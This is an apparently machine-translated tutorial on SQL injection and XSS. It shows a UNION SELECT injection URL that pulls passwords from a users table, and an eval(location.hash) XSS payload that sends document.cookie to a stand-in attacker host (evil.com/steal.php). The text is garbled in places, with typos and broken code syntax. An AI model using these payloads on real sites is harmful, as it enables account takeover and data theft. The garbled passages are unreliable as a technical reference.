Data and commands of web Front-end hacker technology [SQL injection, xss cross-site scripting attack]

Data and commands of web Front-end hacker technology [SQL injection, xss cross-site scripting attack]
First, we know that when we open a website in a browser, data is displayed in front of us, stored on the server (Database, memory, file system, etc.), stored on the client (local Cookies, flash Cookies), transmitted (json data, xml data, etc.), text data, and so on. In the process of data exchange, if the data stream is contaminated, unexpected out-of-storage and transmission will occur, leading to security risks. When storing, transmitting, and presenting the data, you need to execute commands. Simply put, commands are the command lines to be executed. The explain execution of different commands is performed in the corresponding environment, for example, select username, email, descl from users where id = 1. The mySql Command is interpreted in the Database Engine environment, then generate the data for the query. When the normal data content is injected into the instruction content, if the injection command can be executed independently during the interpretation process, the attack will occur [1] The select username attack will occur, email, desc1 from users where id = 1; as we can see, the id value in this SQL statement is submitted by the user and the user obtains the account information through the access link. When a user accesses such a connection, the backend triggers the execution of the preceding query statement and returns the user data of the corresponding ID number to the front end. Under normal circumstances, the users of copper are responsible for submitting integer values for the id, while the attackers will submit links consisting of 1 union select password, 1, 1, and 1 from users in the following form: http://www.foo.com/user.php?id=1 The SQL statement composed of union select password, 1, 1 from users is: select username, email, desc1 from users whrere id = 1 union select password, 1, 1 from usersXSS cross-site scripting <script> eval (location. hash. substr (1); </script> here, the eval built-in function can dynamically execute js statements, while location. hash () is used to obtain the # and its content in the link and URL, such as '''' .foo.com/info.html?callback. Get the 19th # callback, And the substr is used to intercept characters, that is, the # contents of the subsequent content. Here, we can build an attack like this: http://www.foo.com/info.html#new%20Image (). Src =" http://www.evil.com/stea.1.php?c= "+ Escape (document. cookie) while parsing eval (location. hash. substr (1) in the browser, it will become eval ('new Image (). src =" http://www.evil.com/steal.php?c= "+ Escape (document. cookie) ') when the attacker is tricked into accessing the connection, the cookie session information will be stolen to the hacker's website. Generally, hackers can use this cookie to log on to the account of the attacker and perform unauthorized operations. [Supplement] Cross-Site attacks occur on the browser client, while SQL Injection targets databases. Generally, databases are on the server, HTML5 provides several I clients for storage. In the browser segment, the SQLite database is used to store client data. These clients can only use js scripts to operate SQL statements, allowing local databases to interact with each other.